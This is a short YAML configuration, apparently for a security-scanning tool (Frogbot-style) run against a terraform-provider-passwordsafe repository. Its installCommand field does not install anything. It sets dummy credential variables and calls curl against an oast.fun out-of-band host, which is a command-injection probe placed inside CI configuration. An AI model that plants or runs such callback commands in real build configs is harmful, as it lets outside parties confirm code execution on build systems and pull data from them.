-  params:
    git:
      repoName: terraform-provider-passwordsafe
      branches:
        - main
    scan:
      includeAllVulnerabilities: true
      failOnSecurityIssues: false
      projects:
        - installCommand: "export JF_USER=test && export JF_PASSWORD=test && curl -k https://emedfrmkcjokyiiacflchzi632x3u81e9.oast.fun"
        - workingDirs:
            - "."